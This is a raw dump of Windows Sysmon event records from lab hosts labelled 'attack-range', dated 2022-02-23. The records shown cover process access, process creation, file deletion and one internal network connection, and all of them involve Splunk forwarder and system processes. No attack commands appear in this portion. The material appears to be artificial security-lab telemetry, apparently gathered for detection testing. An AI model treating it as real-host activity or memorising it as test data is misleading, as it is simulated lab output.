11:16:49.792{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221414Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.792{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-17A1-6216-1405-000000003902}3460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221413Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.792{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-17A1-6216-1405-000000003902}3460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221412Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.793{4F8D34B0-17A1-6216-1405-000000003902}3460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000221411Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.355{4F8D34B0-17A1-6216-1305-000000003902}28363428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221410Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.120{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-17A1-6216-1305-000000003902}2836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221409Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.120{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221408Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.120{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221407Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.120{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221406Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.120{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221405Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.120{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221404Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.120{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221403Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.120{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221402Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.120{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221401Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.104{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221400Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.104{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-17A1-6216-1305-000000003902}2836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221399Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.104{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-17A1-6216-1305-000000003902}2836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221398Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.105{4F8D34B0-17A1-6216-1305-000000003902}2836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297549Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:50.169{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A879E52008A60EA7DA1FEF2BD722DBA,SHA256=D702A406886170AB600E98FFB0D1D66E7D93B2AEC31DB97CD729121BFC6ED5D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221427Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:50.293{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F574F26513B884AF00823464B01A9EE,SHA256=070658311EA20DB5285EA95C5B60449948D258769DDE873FD1F54F9F28E5DC6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221426Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:50.293{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=158FC3F39A97874EB5AEDED7DA827F8F,SHA256=97868CEF467B3A8FBC98C44C4E37AA20686C0C3EF301B9BAF17BC1F60C9C4B75,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221425Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:50.105{4F8D34B0-17A1-6216-1405-000000003902}34601528C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297550Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:51.206{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07D93423F446809C99EA790405AD7B14,SHA256=BBF24CC373258F5A884899A6F00CBE9797AC0CF5997555754A82FB2EE57EA4A0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221442Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:49.681{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51648-false10.0.1.12-8000- 10341000x8000000000000000221441Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:51.262{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-17A3-6216-1505-000000003902}716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221440Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:51.262{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221439Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:51.262{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221438Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:51.262{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221437Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:51.262{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221436Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 